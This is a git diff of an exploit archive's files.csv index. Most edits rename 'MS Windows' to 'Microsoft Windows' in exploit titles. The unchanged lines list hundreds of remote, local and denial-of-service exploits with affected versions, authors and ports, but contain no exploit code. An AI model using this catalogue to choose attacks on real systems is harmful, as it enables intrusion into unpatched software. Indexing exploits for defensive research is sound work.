diff --git a/files.csv b/files.csv index cc751bdb9..cc051b1f3 100755 --- a/files.csv +++ b/files.csv @@ -1,9 +1,9 @@ id,file,description,date,author,platform,type,port -1,platforms/windows/remote/1.c,"MS Windows WebDAV - (ntdll.dll) Remote Exploit",2003-03-23,kralor,windows,remote,80 -2,platforms/windows/remote/2.c,"MS Windows WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80 +1,platforms/windows/remote/1.c,"Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit",2003-03-23,kralor,windows,remote,80 +2,platforms/windows/remote/2.c,"Microsoft Windows WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0 -5,platforms/windows/remote/5.c,"MS Windows RPC Locator Service - Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 +5,platforms/windows/remote/5.c,"Microsoft Windows RPC Locator Service - Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 6,platforms/php/webapps/6.php,"WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0 @@ -17,7 +17,7 @@ id,file,description,date,author,platform,type,port 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service Exploit",2003-04-22,"Tom Ferris",windows,dos,0 18,platforms/linux/remote/18.sh,"Snort <= 1.9.1 - Remote Root Exploit (p7snort191.sh)",2003-04-23,truff,linux,remote,0 19,platforms/linux/remote/19.c,"PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (poptop-sane.c)",2003-04-25,blightninjas,linux,remote,1723 -20,platforms/windows/remote/20.txt,"MS Windows SMB - Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139 +20,platforms/windows/remote/20.txt,"Microsoft Windows SMB - Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Local Root Exploit",2003-04-29,Xpl017Elz,linux,local,0 22,platforms/windows/dos/22.c,"Pi3Web 2.0.1 - Denial of Service - Proof of Concept",2003-04-29,aT4r,windows,dos,0 23,platforms/windows/remote/23.c,"Real Server < 8.0.2 - Remote Exploit (Windows Platforms)",2003-04-30,"Johnny Cyberpunk",windows,remote,554 @@ -29,11 +29,11 @@ id,file,description,date,author,platform,type,port 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE Local Root Exploit",2003-05-12,bob,bsd,local,0 30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 Remote Command Execution Exploit",2003-05-12,N/A,windows,remote,0 31,platforms/linux/local/31.pl,"CdRecord Version <= 2.0 - Mandrake local root exploit",2003-05-14,N/A,linux,local,0 -32,platforms/windows/local/32.c,"MS Windows XP (explorer.exe) - Buffer Overflow Exploit",2003-05-21,einstein,windows,local,0 +32,platforms/windows/local/32.c,"Microsoft Windows XP (explorer.exe) - Buffer Overflow Exploit",2003-05-21,einstein,windows,local,0 33,platforms/linux/remote/33.c,"WsMp3d 0.x Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) Remote Exploit",2003-05-29,N/A,linux,remote,80 -35,platforms/windows/dos/35.c,"MS Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0 -36,platforms/windows/remote/36.c,"MS Windows WebDav II - (New) Remote Root Exploit",2003-06-01,alumni,windows,remote,80 +35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0 +36,platforms/windows/remote/36.c,"Microsoft Windows WebDav II - Remote Root Exploit (new)",2003-06-01,alumni,windows,remote,80 37,platforms/windows/remote/37.pl,"MS Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - Remote Root Exploit (atftpdx.c)",2003-06-10,gunzip,linux,remote,69 @@ -45,40 +45,40 @@ id,file,description,date,author,platform,type,port 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - Remote Exploit (DSR-ducky.c)",2003-06-23,Rave,windows,remote,80 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow Exploit",2003-06-27,B-r00t,linux,remote,25 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - Remote php File Include Exploit",2003-06-30,Spoofed,php,webapps,0 -48,platforms/windows/remote/48.c,"MS Windows Media Services Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80 +48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 50,platforms/windows/remote/50.pl,"ColdFusion MX Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 -51,platforms/windows/remote/51.c,"MS Windows WebDav III - Remote Root Exploit (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 +51,platforms/windows/remote/51.c,"Microsoft Windows WebDav III - Remote Root Exploit (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 53,platforms/cgi/webapps/53.c,"CCBILL CGI Remote Exploit for whereami.cgi (ccbillx.c)",2003-07-10,knight420,cgi,webapps,0 54,platforms/windows/remote/54.c,"LeapFTP 2.7.x Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21 55,platforms/linux/remote/55.c,"Samba 2.2.8 (Bruteforce Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139 -56,platforms/windows/remote/56.c,"MS Windows Media Services (nsiislog.dll) Remote Exploit",2003-07-14,N/A,windows,remote,80 +56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - (nsiislog.dll) Remote Exploit",2003-07-14,N/A,windows,remote,80 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 59,platforms/hardware/dos/59.c,"Cisco IOS IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0 60,platforms/hardware/dos/60.c,"Cisco IOS IPv4 Packet Denial of Service Exploit (cisco-bug-44020.c)",2003-07-21,"Martin Kluge",hardware,dos,0 -61,platforms/windows/dos/61.c,"MS Windows 2000 RPC DCOM Interface DoS Exploit",2003-07-21,Flashsky,windows,dos,0 +61,platforms/windows/dos/61.c,"Microsoft Windows 2000 - RPC DCOM Interface DoS Exploit",2003-07-21,Flashsky,windows,dos,0 62,platforms/hardware/dos/62.sh,"Cisco IOS (using hping) Remote Denial of Service Exploit",2003-07-22,zerash,hardware,dos,0 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114 -64,platforms/windows/remote/64.c,"MS Windows (RPC DCOM) Remote Buffer Overflow Exploit",2003-07-25,Flashsky,windows,remote,135 -65,platforms/windows/dos/65.c,"MS Windows SQL Server Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0 -66,platforms/windows/remote/66.c,"MS Windows (RPC DCOM) Remote Exploit (w2k+XP Targets)",2003-07-26,"H D Moore",windows,remote,135 +64,platforms/windows/remote/64.c,"Microsoft Windows - (RPC DCOM) Remote Buffer Overflow Exploit",2003-07-25,Flashsky,windows,remote,135 +65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0 +66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit",2003-07-26,"H D Moore",windows,remote,135 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo Remote Code Execution Exploit",2003-07-28,"Carl Livitt",multiple,remote,80 68,platforms/linux/dos/68.c,"Linux Kernel <= 2.4.20 - decode_fh Denial of Service Exploit",2003-07-29,"Jared Stanbrough",linux,dos,0 -69,platforms/windows/remote/69.c,"MS Windows RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 -70,platforms/windows/remote/70.c,"MS Windows (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,N/A,windows,remote,135 +69,platforms/windows/remote/69.c,"Microsoft Windows RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 +70,platforms/windows/remote/70.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,N/A,windows,remote,135 71,platforms/linux/local/71.c,"XGalaga 2.0.34 local game exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0 72,platforms/linux/local/72.c,"xtokkaetama 1.0b Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0 73,platforms/windows/dos/73.c,"Trillian 0.74 Remote Denial of Service Exploit",2003-08-01,l0bstah,windows,dos,0 74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 off-by-one Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21 75,platforms/linux/local/75.c,"man-db 2.4.1 open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 -76,platforms/windows/remote/76.c,"MS Windows (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135 +76,platforms/windows/remote/76.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135 77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80 78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit (advanced version)",2003-08-11,Xpl017Elz,linux,remote,21 79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0 80,platforms/windows/remote/80.c,"Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100 -81,platforms/windows/remote/81.c,"MS Windows 2000 RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0 +81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0 82,platforms/windows/dos/82.c,"Piolet Client 1.05 Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0 83,platforms/windows/remote/83.html,"MS Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0 84,platforms/linux/remote/84.c,"Gopherd <= 3.0.5 FTP Gateway Remote Overflow Exploit",2003-08-22,vade79,linux,remote,70 @@ -92,43 +92,43 @@ id,file,description,date,author,platform,type,port 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 DoS",2003-09-08,badpack3t,multiple,dos,80 95,platforms/multiple/remote/95.c,"Roger Wilco 1.x Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0 96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite Remote Buffer Overflow Exploit",2003-09-11,B-r00t,osx,remote,21 -97,platforms/windows/remote/97.c,"MS Windows (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 +97,platforms/windows/remote/97.c,"Microsoft Windows - (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x Remote Exploit",2003-09-14,bkbll,linux,remote,3306 99,platforms/linux/remote/99.c,"Pine <= 4.56 Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0 -100,platforms/windows/remote/100.c,"MS Windows (RPC DCOM) Long Filename Overflow Exploit (MS03-026)",2003-09-16,ey4s,windows,remote,135 +100,platforms/windows/remote/100.c,"Microsoft Windows - (RPC DCOM) Long Filename Overflow Exploit (MS03-026)",2003-09-16,ey4s,windows,remote,135 101,platforms/solaris/remote/101.pl,"Solaris Sadmind Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit",2003-09-20,N/A,linux,remote,617 -103,platforms/windows/remote/103.c,"MS Windows (RPC DCOM2) Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 +103,platforms/windows/remote/103.c,"Microsoft Windows - (RPC DCOM2) Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 104,platforms/linux/local/104.c,"hztty 2.0 - Local root exploit (Tested on Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow Exploit",2003-09-27,kokanin,bsd,remote,5308 106,platforms/linux/local/106.c,"IBM DB2 Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0 107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 -109,platforms/windows/remote/109.c,"MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,N/A,windows,remote,135 +109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,N/A,windows,remote,135 110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21 -111,platforms/windows/dos/111.c,"MS Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 +111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 112,platforms/windows/remote/112.c,"mIRC 6.1 ""IRC"" Protocol Remote Buffer Overflow Exploit",2003-10-21,blasty,windows,remote,0 113,platforms/windows/dos/113.pl,"MS Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) Buffer Overflow Exploit (SPARC version)",2003-10-27,osker178,solaris,local,0 115,platforms/linux/dos/115.c,"wu-ftpd 2.6.2 - Remote Denial of Service Exploit (wuftpd-freezer.c)",2003-10-31,"Angelo Rosiello",linux,dos,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server <= 4.10 Remote Exploit",2003-11-04,xCrZx,windows,remote,515 -117,platforms/windows/remote/117.c,"MS Windows XP/2000 RPC Remote (non exec memory) Exploit",2003-11-07,ins1der,windows,remote,135 +117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (non exec memory) Exploit",2003-11-07,ins1der,windows,remote,135 118,platforms/bsd/local/118.c,"OpenBSD (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 -119,platforms/windows/remote/119.c,"MS Windows 2000/XP Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 +119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 120,platforms/linux/local/120.c,"TerminatorX <= 3.81 stack overflow local root exploit",2003-11-13,Li0n7,linux,local,0 121,platforms/windows/remote/121.c,"MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 -122,platforms/windows/local/122.c,"MS Windows (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0 -123,platforms/windows/remote/123.c,"MS Windows Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 +122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0 +123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 124,platforms/windows/remote/124.pl,"IA WebMail 3.x - (iaregdll.dll version 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 125,platforms/bsd/local/125.c,"OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - ""do_brk()"" Local Root Exploit (PoC)",2003-12-02,"Christophe Devine",linux,local,0 -130,platforms/windows/remote/130.c,"MS Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 +130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 - (do_brk) Local Root Exploit (working)",2003-12-05,"Wojciech Purczynski",linux,local,0 132,platforms/linux/remote/132.c,"Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0 -135,platforms/windows/remote/135.c,"MS Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 +135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 search_id SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 138,platforms/php/webapps/138.pl,"PHP-NUKE version <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 @@ -141,11 +141,11 @@ id,file,description,date,author,platform,type,port 145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - mremap() Bound Checking Root Exploit",2004-01-15,"Paul Starzetz",linux,local,0 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 147,platforms/windows/dos/147.c,"Need for Speed 2 Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0 -148,platforms/windows/dos/148.sh,"MS Windows XP/2003 Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0 +148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0 149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x ""SITE CHMOD"" Command Remote Exploit",2004-01-27,lion,windows,remote,21 151,platforms/windows/remote/151.txt,"MS Internet Explorer URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local stack overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 -153,platforms/windows/dos/153.c,"MS Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 +153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080 @@ -167,7 +167,7 @@ id,file,description,date,author,platform,type,port 173,platforms/linux/remote/173.pl,"Monit <= 4.1 - Remote Root Buffer Overflow Exploit",2004-04-09,gsicht,linux,remote,2812 174,platforms/linux/remote/174.c,"Monit <= 4.2 - Remote Root Buffer Overflow Exploit",2004-04-12,"Abhisek Datta",linux,remote,2812 175,platforms/windows/remote/175.pl,"eMule <= 0.42d IRC Remote Buffer Overflow Exploit",2004-04-12,kingcope,windows,remote,0 -176,platforms/windows/dos/176.c,"MS Windows IIS SSL Remote Denial of Service Exploit (MS04-011)",2004-04-14,"David Barroso",windows,dos,0 +176,platforms/windows/dos/176.c,"Microsoft Windows IIS - SSL Remote Denial of Service Exploit (MS04-011)",2004-04-14,"David Barroso",windows,dos,0 177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - exploit",2000-11-15,keelis,cgi,webapps,0 178,platforms/linux/local/178.c,"traceroute Local Root Exploit",2000-11-15,"Michel Kaempf",linux,local,0 179,platforms/cgi/webapps/179.c,"News Update 1.1 Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 @@ -202,7 +202,7 @@ id,file,description,date,author,platform,type,port 211,platforms/cgi/webapps/211.c,"PHF - Buffer Overflow Exploit for Linux-x86",2000-12-01,proton,cgi,webapps,0 212,platforms/hp-ux/dos/212.c,"HP-UX FTPD Remote Buffer Overflow Exploit",2000-12-01,venglin,hp-ux,dos,0 213,platforms/solaris/remote/213.c,"Solaris sadmind Remote Buffer Overflow Exploit",2000-12-01,Optyx,solaris,remote,111 -214,platforms/windows/dos/214.c,"MS Windows (Jolt2.c) Denial of Service Exploit",2000-12-02,phonix,windows,dos,0 +214,platforms/windows/dos/214.c,"Microsoft Windows - (Jolt2.c) Denial of Service Exploit",2000-12-02,phonix,windows,dos,0 215,platforms/linux/local/215.c,"mount exploit for glibc locale bug",2000-12-02,sk8,linux,local,0 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0 217,platforms/linux/local/217.c,"UUCP Exploit - file creation/overwriting (symlinks)",2000-12-04,t--zen,linux,local,0 @@ -250,16 +250,16 @@ id,file,description,date,author,platform,type,port 263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service Exploit",2001-05-07,honoriak,novell,dos,0 265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0 -266,platforms/windows/remote/266.c,"MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit",2001-05-07,"Ryan Permeh",windows,remote,80 -268,platforms/windows/remote/268.c,"MS Windows 2000 sp1/sp2 isapi - .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80 +266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow Exploit",2001-05-07,"Ryan Permeh",windows,remote,80 +268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80 269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) - Remote Root Exploit (Linux x86)",2001-05-08,qitest1,linux,remote,21 270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 -271,platforms/windows/local/271.c,"MS Windows Utility Manager Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 +271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0 273,platforms/linux/local/273.c,"SquirrelMail chpasswd buffer overflow",2004-04-20,x314,linux,local,0 274,platforms/linux/dos/274.c,"Linux Kernel <= 2.6.3 - (setsockopt) Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0 -275,platforms/windows/remote/275.c,"MS Windows IIS 5.0 - SSL Remote Buffer Overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 -276,platforms/windows/dos/276.delphi,"MS Windows 2K/XP TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0 +275,platforms/windows/remote/275.c,"Microsoft Windows IIS 5.0 - SSL Remote Buffer Overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 +276,platforms/windows/dos/276.delphi,"Microsoft Windows 2000/XP - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0 277,platforms/linux/remote/277.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit",2001-03-01,Gneisenau,linux,remote,53 279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (2)",2001-03-01,LSD-PLaNET,linux,remote,53 280,platforms/solaris/remote/280.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 @@ -273,9 +273,9 @@ id,file,description,date,author,platform,type,port 289,platforms/cgi/webapps/289.pl,"sendtemp.pl Read Access to Files",2001-03-04,"Tom Parker",cgi,webapps,0 290,platforms/linux/local/290.sh,"GLIBC 2.1.3 ld_preload Local Exploit",2001-03-04,Shadow,linux,local,0 291,platforms/linux/remote/291.c,"TCP Connection Reset Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0 -293,platforms/windows/remote/293.c,"MS Windows Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011)",2004-04-24,sbaa,windows,remote,445 +293,platforms/windows/remote/293.c,"Microsoft Windows - Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011)",2004-04-24,sbaa,windows,remote,445 294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000 -295,platforms/windows/remote/295.c,"MS Windows XP/2K Lsasrv.dll Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 +295,platforms/windows/remote/295.c,"Microsoft Windows 2000/XP - Lsasrv.dll Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 Remote Buffer overflow Exploit",2004-05-05,vade79,linux,remote,0 297,platforms/windows/remote/297.c,"Sasser Worm ftpd Remote Buffer Overflow Exploit (port 5554)",2004-05-16,mandragore,windows,remote,5554 298,platforms/windows/dos/298.pl,"Emule 0.42e Remote Denial of Service Exploit",2004-05-16,"Rafel Ivgi",windows,dos,80 @@ -303,7 +303,7 @@ id,file,description,date,author,platform,type,port 324,platforms/windows/dos/324.txt,"Ping of Death Remote Denial of Service Exploit",1996-10-21,N/A,windows,dos,0 325,platforms/linux/local/325.c,"BSD & Linux - lpr Command Local Root Exploit",1996-10-25,"Vadim Kolontsov",linux,local,0 328,platforms/solaris/local/328.c,"Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits",1997-03-23,"Cristian Schipor",solaris,local,0 -329,platforms/windows/dos/329.txt,"MS Windows NT Crash with an Extra Long Username DoS Exploit",1997-04-01,Fyodor,windows,dos,0 +329,platforms/windows/dos/329.txt,"Microsoft Windows NT Crash with an Extra Long Username DoS Exploit",1997-04-01,Fyodor,windows,dos,0 330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp and lpsched Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 331,platforms/linux/local/331.c,"LibXt XtAppInitialize() overflow *xterm exploit",1997-05-14,"Ming Zhang",linux,local,0 332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps & chkey Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 @@ -322,12 +322,12 @@ id,file,description,date,author,platform,type,port 